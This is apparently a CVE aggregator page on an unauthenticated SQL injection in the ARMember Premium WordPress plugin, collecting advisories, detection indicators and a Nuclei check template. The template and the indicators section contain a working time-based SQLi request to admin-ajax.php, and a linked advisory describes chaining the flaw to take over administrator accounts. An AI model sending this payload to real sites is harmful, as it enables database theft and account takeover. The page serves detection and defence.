CVE-2026-5073
published 2026-06-02CVE-2026-5073: The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all…
PriorityP180high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
1.38%
68.7th percentile
The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient escaping on the user-supplied 'order' and 'orderby' parameters and the lack of sufficient preparation on the existing SQL query in the `arm_get_directory_members()` function. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Detection & IOCsextracted from sources · hover to see the quote
url/wp-admin/admin-ajax.php
commandaction=arm_directory_paging_action&pagination=infinite&id=1&type=directory&orderby=display_name,IF(1=1,SLEEP(6),0)&order=ASC&per_page=10¤t_page=1&arm_wp_nonce={{nonce}}
otherarm_wp_nonce
- →Detect exploitation attempts by monitoring POST requests to /wp-admin/admin-ajax.php with the 'action' parameter set to 'arm_directory_paging_action' and SQL time-based blind injection payloads (e.g., SLEEP, IF) in the 'orderby' parameter.
- →A time-based blind SQLi detection threshold of >=6 seconds response duration is used in the PoC; monitor for anomalously slow responses to this AJAX endpoint.
- →The exploit is unauthenticated — no session cookie or authentication header is required. Any POST to admin-ajax.php with action=arm_directory_paging_action from an unauthenticated source should be treated as suspicious. ↗
- →The nonce value 'arm_wp_nonce' is extracted from the page prior to exploitation (regex: `]*value='([a-f0-9]+)'`); monitor for reconnaissance GET requests harvesting this nonce before a subsequent SQLi POST.
- →Confirm exploitation by checking that the response body contains 'arm_directory_paging_container', which the PoC uses as a positive indicator of a successful injected query response.
- ·All versions of ARMember Premium up to and including 7.3.1 are vulnerable; ensure the plugin version is checked when scoping detection rules. ↗
- ·The injection point is the 'order' and 'orderby' parameters of the arm_directory_paging_action AJAX action, specifically within the arm_get_directory_members() function — WAF rules should target both parameters. ↗
- ·The PoC uses a 15-second HTTP timeout to accommodate the SLEEP(6) payload; network-level detection using response-time anomalies should use a threshold of ≥6 seconds for this endpoint.
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
ARMember Premium Plugin up to 7.3.1 on WordPress AJAX Action arm_get_directory_members order/orderby sql injection
vuldb·2026-06-03·CVSS 7.5
CVE-2026-5073 [HIGH] ARMember Premium Plugin up to 7.3.1 on WordPress AJAX Action arm_get_directory_members order/orderby sql injection
A vulnerability marked as critical has been reported in ARMember Premium Plugin up to 7.3.1 on WordPress. This affects the function arm_get_directory_members of the component AJAX Action Handler. The manipulation of the argument order/orderby leads to sql injection.
This vulnerability is uniquely identified as CVE-2026-5073. The attack is possible to be carried out remotely. No exploit exists.
GHSA
The ARMember Premium plugin for WordPress is vulnerable to an insecure password reset mechanism in all versions up to, and including, 7.3.1.
ghsa_unreviewed·2026-06-02·CVSS 7.5
CVE-2026-5076 [HIGH] CWE-287 The ARMember Premium plugin for WordPress is vulnerable to an insecure password reset mechanism in all versions up to, and including, 7.3.1.
The ARMember Premium plugin for WordPress is vulnerable to an insecure password reset mechanism in all versions up to, and including, 7.3.1. The plugin stores a plaintext copy of the password reset key in the `arm_reset_password_key` user meta field when a user requests a password reset. This is in addition to the hashed key that WordPress core stores securely in `wp_users.user_activation_key`. The plaintext key stored in `wp_usermeta` can be used with the plugin's custom `armrp` reset action to set a new password for any user. Combined with another vulnerability such as SQL Injection (CVE-2026-5073, CVE-2026-5074), this makes it possible for unauthenticated attackers to extract the plaintext reset key and take over any user account, including administrators.
GHSA
The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1.
ghsa_unreviewed·2026-06-02
CVE-2026-5073 [HIGH] CWE-89 The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1.
The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient escaping on the user-supplied 'order' and 'orderby' parameters and the lack of sufficient preparation on the existing SQL query in the `arm_get_directory_members()` function. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
VulnCheck
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2026·CVSS 7.5
CVE-2026-5073 [HIGH] Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient escaping on the user-supplied 'order' and 'orderby' parameters and the lack of sufficient preparation on the existing SQL query in the `arm_get_directory_members()` function. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitig
No detection rules found.
Nuclei
WordPress ARMember Premium <= 7.3.1 - Unauthenticated SQL Injection
nuclei·CVSS 7.5
CVE-2026-5073 [HIGH] WordPress ARMember Premium <= 7.3.1 - Unauthenticated SQL Injection
WordPress ARMember Premium ]*value='([a-f0-9]+)'"
matchers:
- type: word
words:
- "arm_wp_nonce"
internal: true
- id: sqli
raw:
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=arm_directory_paging_action&pagination=infinite&id=1&type=directory&orderby=display_name,IF(1=1,SLEEP(6),0)&order=ASC&per_page=10¤t_page=1&arm_wp_nonce={{nonce}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "duration>=6"
- type: word
part: body
words:
- "arm_directory_paging_container"
# digest: 4a0a00473045022100ae53d4e9e6d63fbf8361afe21b261b1e671791f2623f344a2777f62f5fa0420802204bd340155fe11bbf495fba6433efbd41572709328adce55fa6477c712558bd4d:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2026-06-02
Published
Exploited in the wild